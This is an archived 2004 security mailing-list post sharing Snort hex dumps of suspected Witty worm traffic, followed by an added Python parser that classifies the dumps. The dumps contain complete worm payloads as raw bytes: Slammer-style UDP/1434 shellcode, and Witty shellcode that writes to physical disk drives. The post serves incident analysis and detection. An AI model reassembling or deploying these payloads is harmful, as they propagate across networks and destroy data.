Security Incidents mailing list archives

RE: new variant of witty worm ????


From: Steven Trewick <STrewick () joplings co uk>
Date: Wed, 24 Mar 2004 15:30:50 -0000



(Packet dump to follow ASAP)

As promised, here are my snort traces for the weird packets
that look very much like mutated/mangled versions of the
'witty' worm.

There are two of the 'variant' packets, then one which looks
like the same traffic that we saw on Saturday (although I
have not had time to confirm this yet).



03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434
UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/22-22:26:10.414371 128.11.41.149:2386 -> 192.168.0.88:1434
UDP TTL:109 TOS:0x0 ID:1650 IpLen:20 DgmLen:404
Len: 376
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE  ....B.........p.
42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9  B.p.B........h..
B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01  .B.....1...P..5.
01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33  ...P..Qh.dllhel3
32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B  2hkernQhounthick
43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64  ChGetTf.llQh32.d
68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66  hws2_f.etQhsockf
B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45  .toQhsend....B.E
D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50  .P..P.E.P.E.P..P
BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05  ....B....=U..Qt.
BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1  ....B....1.QQP..
03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B  ..........Q.E.P.
45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45  E.P..j.j.j...P.E
C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61  .P.E.P........<a
D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2  ...E...@........
C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D  ...).......E.j..
45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50  E.P1.Qf..x.Q.E.P
8B 45 AC 50 FF D6 EB CA                          .E.P....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802
UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:840
Len: 812
05 00 00 00 00 00 00 12 02 00 00 00 00 00 00 00  ................
00 00 00 00 00 02 2C 00 05 00 00 00 00 00 00 6E  ......,........n
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 41 02 05 00 00 00 00 00 00 DE 03 00  ....A...........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00  ................
00 01 00 00 01 00 00 1E 02 20 20 20 20 20 20 20  .........
28 5E 2E 5E 29 20 20 20 20 20 20 69 6E 73 65 72  (^.^)      inser
74 20 77 69 74 74 79 20 6D 65 73 73 61 67 65 20  t witty message
68 65 72 65 2E 20 20 20 20 20 20 28 5E 2E 5E 29  here.      (^.^)
20 20 20 20 20 20 20 89 E7 8B 7F 14 83 C7 08 81         .........
C4 E8 FD FF FF 31 C9 66 B9 33 32 51 68 77 73 32  .....1.f.32Qhws2
5F 54 3E FF 15 9C 40 0D 5E 89 C3 31 C9 66 B9 65  _T>...@.^..1.f.e
74 51 68 73 6F 63 6B 54 53 3E FF 15 98 40 0D 5E  tQhsockTS>...@.^
6A 11 6A 02 6A 02 FF D0 89 C6 31 C9 51 68 62 69  j.j.j.....1.Qhbi
6E 64 54 53 3E FF 15 98 40 0D 5E 31 C9 51 51 51  ndTS>...@.^1.QQQ
81 E9 FE FF F0 5F 51 89 E1 6A 10 51 56 FF D0 31  ....._Q..j.QV..1
C9 66 B9 74 6F 51 68 73 65 6E 64 54 53 3E FF 15  .f.toQhsendTS>..
98 40 0D 5E 89 C3 83 C4 3C 31 C9 51 68 65 6C 33  .@.^....<1.Qhel3
32 68 6B 65 72 6E 54 3E FF 15 9C 40 0D 5E 31 C9  2hkernT>...@.^1.
51 68 6F 75 6E 74 68 69 63 6B 43 68 47 65 74 54  QhounthickChGetT
54 50 3E FF 15 98 40 0D 5E FF D0 89 C5 83 C4 1C  TP>...@.^.......
31 C9 81 E9 E0 B1 FF FF 51 31 C0 2D 03 BC FC FF  1.......Q1.-....
F7 E5 2D 3D 61 D9 FF 89 C1 31 C0 2D 03 BC FC FF  ..-=a....1.-....
F7 E1 2D 3D 61 D9 FF 89 C5 31 D2 52 52 C1 E9 10  ..-=a....1.RR...
66 89 C8 50 31 C0 2D 03 BC FC FF F7 E5 2D 3D 61  f..P1.-......-=a
D9 FF 89 C5 30 E4 B0 02 50 89 E0 6A 10 50 31 C0  ....0...P..j.P1.
50 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5 C1  P-......-=a.....
E8 17 80 C4 03 50 57 56 FF D3 83 C4 10 59 E2 98  .....PWV.....Y..
31 C0 2D 03 BC FC FF F7 E5 2D 3D 61 D9 FF 89 C5  1.-......-=a....
C1 E8 10 80 E4 07 80 CC 30 B0 45 50 68 44 52 49  ........0.EPhDRI
56 68 49 43 41 4C 68 50 48 59 53 68 5C 5C 2E 5C  VhICALhPHYSh\\.\
89 E0 31 C9 51 B2 20 C1 E2 18 52 6A 03 51 6A 03  ..1.Q. ...Rj.Qj.
D1 E2 52 50 3E FF 15 DC 40 0D 5E 83 C4 14 31 C9  ..RP>...@.^...1.
81 E9 E0 B1 FF FF 3D FF FF FF FF 0F 84 37 FF FF  ......=......7..
FF 56 89 C6 31 C0 50 50 2D 03 BC FC FF F7 E5 2D  .V..1.PP-......-
3D 61 D9 FF 89 C5 D1 E8 66 89 C8 50 56 3E FF 15  =a......f..PV>..
C4 40 0D 5E 31 C9 51 89 E2 51 52 B5 80 D1 E1 51  .@.^1.Q..QR....Q
B1 5E C1 E1 18 51 56 3E FF 15 94 40 0D 5E 56 3E  .^...QV>...@.^V>
FF 15 38 40 0D 5E 5E 5E E9 AC FE FF FF 63 76 07  ..8@.^^^.....cv.
5E E9 21 FE FF FF 00 43 66 6A 76 63 6C 62 34 31  ^.!....Cfjvclb41
50 51 35 30 6A 48 31 50 63 34 50 51 55 59 48 78  PQ50jH1Pc4PQUYHx
37 74 65 4F 7A 54 53 54 59 54 65 4C 4D 41 0D 0A  7teOzTSTYTeLMA..
44 6C 44 33 52 37 6C 56 74 42 43 75 6B 6B 68 64  DlD3R7lVtBCukkhd
7A 2B 32 76 6F 75 30 33 41 63 35 57 4F 52 6B 75  z+2vou03Ac5WORku
71 72 67 64 4B 72 75 31 5A 49 4F 43 6C 53 52 2F  qrgdKru1ZIOClSR/
78 51 4F 69 4B 6F 36 48 7A 4A 75 67 52 72 49 34  xQOiKo6HzJugRrI4
73 37 4F 6B 53 4B 77 50 71 4C 75 34 0D 0A 35 62  s7OkSKwPqLu4..5b
61 4E 62 52 30 67 50 4E 59 50 40 00 34 06 B6 62  aNbR0gPNYP@.4..b
40 44 52 19 92 8E 01 A0 11 00 07 00 46 00 00 00  @DR.........F...
46 00 00 00 80 00 00 00 02 00 00 00              F...........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
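The traces above, worked as an added example that is not part of the original post: a parser for Snort's ASCII hex-dump format that reassembles each UDP payload, checks it against the `Len:` field, and separates the two payload shapes seen in the three dumps by observable features only (the "insert witty message here" text versus the 0x04-prefixed payload to UDP/1434). The sample input is constructed from the post's packet headers with the payloads shortened to a few rows.

```python
import re
from dataclasses import dataclass, field
# Constructed sample in Snort's ASCII dump format: the post's headers, payloads cut short.
SAMPLE = """\
03/22-21:36:31.155369 211.99.223.42:1045 -> 192.168.0.88:1434
UDP TTL:105 TOS:0x0 ID:35759 IpLen:20 DgmLen:52
Len: 24
04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
01 DC C9 B0 42 EB 0E 01                          ....B...
03/22-22:31:15.196762 155.69.109.158:4000 -> 192.168.0.88:44802
UDP TTL:101 TOS:0x0 ID:2427 IpLen:20 DgmLen:76
Len: 48
05 00 00 00 00 00 00 12 02 00 00 00 00 00 00 00  ................
28 5E 2E 5E 29 20 69 6E 73 65 72 74 20 77 69 74  (^.^) insert wit
74 79 20 6D 65 73 73 61 67 65 20 68 65 72 65 2E  ty message here.
"""
HEADER_RE = re.compile(r"^(\d\d/\d\d-[\d:.]+) (\S+):(\d+) -> (\S+):(\d+)$")
LEN_RE = re.compile(r"^Len: (\d+)$")
HEX_ROW_RE = re.compile(r"^(?:[0-9A-Fa-f]{2} ?)+$")
WITTY_MARKER = b"insert witty message here"
@dataclass
class Packet:
    src: str; sport: int; dst: str; dport: int
    declared_len: int = 0
    payload: bytearray = field(default_factory=bytearray)
def parse_snort_dump(text: str) -> list[Packet]:
    # Reassemble each UDP payload from Snort's header line, "Len:" line and hex rows.
    packets, cur = [], None
    for line in text.splitlines():
        if m := HEADER_RE.match(line.strip()):
            packets.append(cur := Packet(m[2], int(m[3]), m[4], int(m[5])))
        elif cur is None: continue
        elif m := LEN_RE.match(line.strip()):
            cur.declared_len = int(m[1])
        else:
            # 16 hex columns fill the first 48 characters; the ASCII gutter beyond is ignored
            row = line[:48].strip()
            if row and HEX_ROW_RE.match(row):
                cur.payload += bytes.fromhex(row)
    return packets
def classify(pkt: Packet) -> str:
    # Tell the two payload shapes in the traces apart using only observable features.
    if len(pkt.payload) != pkt.declared_len:
        return f"incomplete dump: {len(pkt.payload)} of {pkt.declared_len} bytes"
    if WITTY_MARKER in pkt.payload:
        # Witty's hallmarks: source port 4000 and the "(^.^) insert witty message here." text
        return f"witty marker, sport={pkt.sport}"
    if pkt.dport == 1434 and pkt.payload[:1] == b"\x04":
        # 0x04 lead byte with 0x01 fill to UDP/1434 is the SQL Slammer shape, not Witty's
        return "udp/1434 0x04-prefixed, no witty marker"
    return "unclassified"
```

Run against the full mail body, the length check also flags a dump that lost a row in transit, which is worth doing before reading anything into the bytes.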